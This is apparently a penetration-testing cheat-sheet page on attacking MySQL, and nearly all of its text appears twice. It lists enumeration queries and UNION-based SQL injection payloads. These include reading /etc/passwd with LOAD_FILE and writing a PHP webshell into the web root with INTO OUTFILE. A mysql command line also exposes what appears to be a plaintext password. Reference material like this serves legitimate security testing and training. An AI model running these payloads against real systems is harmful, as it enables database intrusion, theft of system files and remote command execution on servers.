MySQL (3306)

Last updated 4 days ago

Was this helpful?

MySQL (3306)

Usage

SELECT version();

SELECT current_user();
SELECT user();
SELECT system_user();

SHOW databases;

SHOW tables FROM <database>;

MySQL stores information about itself in the database, which is a read-only repository of the metadata of the MySQL database server, providing insights into the structure and organization of the database environment. It contains some useful tables, such as:

-> Information about all databases.
-> Information about all tables.
-> Details about columns in the tables.

We can use the following SELECT-based queries to enumerate the DBMS via the information_schema database.

SELECT table_schema FROM information_schema.tables GROUP BY table_schema;

SELECT table_name FROM information_schema.tables WHERE table_schema='<table>';

SELECT column_name, data_type FROM information_schema.columns WHERE table_schema = '<database>' AND table_name = '<table>';

We can connect through Linux via mysql.

mysql -h localhost -u lewis -pP4ntherg0t1n5r3c0n##

For an example of MySQL usage see .

SQLi

Enumeration

The INFORMATION_SCHEMA database contains metadata about the server databases and tables. Its SCHEMATA table contains information about all server databases.

On the below commands, the comment at the end includes a space: -- ! The # symbol can also be used.

a' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA--

a' UNION select 1,database(),2,3--

a' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='db1'--

a' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='table1'--

a' ' UNION select 1, col1, col2, 4 from db1.table1--

Read/Write

The FILE privilege is needed to both read and write files.

MySQL has a secure_file_priv system variable that restricts which directories can be used to read or write files.

SECURE_FILE_PRIV value

PERMISSIONS

Read files from anywhere.

random_directory

Only read from the specified directory.

NULL

Cannot read/write anywhere.

Thus, we first need to enumerate secure_file_priv's value.

SELECT @@GLOBAL.secure_file_priv;

We can use the INTO OUTFILE '<file>' clause to write a file (the file location must be writable to the OS user the database software is running as). For example, if the secure_file_priv is set to the /var/lib/mysql-files directory, we can only write a file within that folder.

SELECT * FROM users INTO OUTFILE '/var/lib/mysql-files/test.txt'

To read the above file, we can use the LOAD_FILE('<file>') clause.

SELECT LOAD_FILE('/var/lib/mysqlfiles/test.txt')

Some UNION-based payload can be found below.

a' UNION SELECT 1, user(), 3, 4-- 
a' UNION SELECT 1, user, 3, 4 from mysql.user--

a' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="user1"--

a' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="user1"--

a' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4--

To WRITE files the FILE privilege is required as well as the secure_file_priv variable must be disabled. In addition, the user must have write access to the location we want to write to.

a' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"--

a' union select 1,'textToBeWritten',3,4 into outfile '/var/www/html/proof.txt'--

a' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'--

To write a webshell, we must know the webroot. We can find it is by using load_file to read the server configuration:

Server

MySQL via WinRM

WinRM does not support interactive prompts like mysql shell normally uses. That means we must use the -e option to execute SQL statements inline:

# List databases
> .\mysql.exe -u root -e "SHOW DATABASES;"

# List tables
.\mysql.exe -u root -D wordpress -e "SHOW TABLES;"
...

Resources

PreviousOracle (1521)NextMariaDB (3306)

Last updated 4 days ago

Was this helpful?

Usage

SELECT version();

SELECT current_user();
SELECT user();
SELECT system_user();

SHOW databases;

SHOW tables FROM <database>;

-> Information about all databases.
-> Information about all tables.
-> Details about columns in the tables.

We can use the following SELECT-based queries to enumerate the DBMS via the information_schema database.

SELECT table_schema FROM information_schema.tables GROUP BY table_schema;

SELECT table_name FROM information_schema.tables WHERE table_schema='<table>';

SELECT column_name, data_type FROM information_schema.columns WHERE table_schema = '<database>' AND table_name = '<table>';

We can connect through Linux via mysql.

mysql -h localhost -u lewis -pP4ntherg0t1n5r3c0n##

For an example of MySQL usage see .

SQLi

Enumeration

The INFORMATION_SCHEMA database contains metadata about the server databases and tables. Its SCHEMATA table contains information about all server databases.

On the below commands, the comment at the end includes a space: -- ! The # symbol can also be used.

a' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA--

a' UNION select 1,database(),2,3--

a' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='db1'--

a' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='table1'--

a' ' UNION select 1, col1, col2, 4 from db1.table1--

Read/Write

The FILE privilege is needed to both read and write files.

MySQL has a secure_file_priv system variable that restricts which directories can be used to read or write files.

SECURE_FILE_PRIV value

PERMISSIONS

Read files from anywhere.

random_directory

Only read from the specified directory.

NULL

Cannot read/write anywhere.

Thus, we first need to enumerate secure_file_priv's value.

SELECT @@GLOBAL.secure_file_priv;

SELECT * FROM users INTO OUTFILE '/var/lib/mysql-files/test.txt'

To read the above file, we can use the LOAD_FILE('<file>') clause.

SELECT LOAD_FILE('/var/lib/mysqlfiles/test.txt')

Some UNION-based payload can be found below.

a' UNION SELECT 1, user(), 3, 4-- 
a' UNION SELECT 1, user, 3, 4 from mysql.user--

a' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="user1"--

a' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="user1"--

a' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4--

To WRITE files the FILE privilege is required as well as the secure_file_priv variable must be disabled. In addition, the user must have write access to the location we want to write to.

a' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"--

a' union select 1,'textToBeWritten',3,4 into outfile '/var/www/html/proof.txt'--

a' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'--

To write a webshell, we must know the webroot. We can find it is by using load_file to read the server configuration:

Server

MySQL via WinRM

WinRM does not support interactive prompts like mysql shell normally uses. That means we must use the -e option to execute SQL statements inline:

# List databases
> .\mysql.exe -u root -e "SHOW DATABASES;"

# List tables
.\mysql.exe -u root -D wordpress -e "SHOW TABLES;"
...

Resources

mysql(1): MySQL tool - Linux man page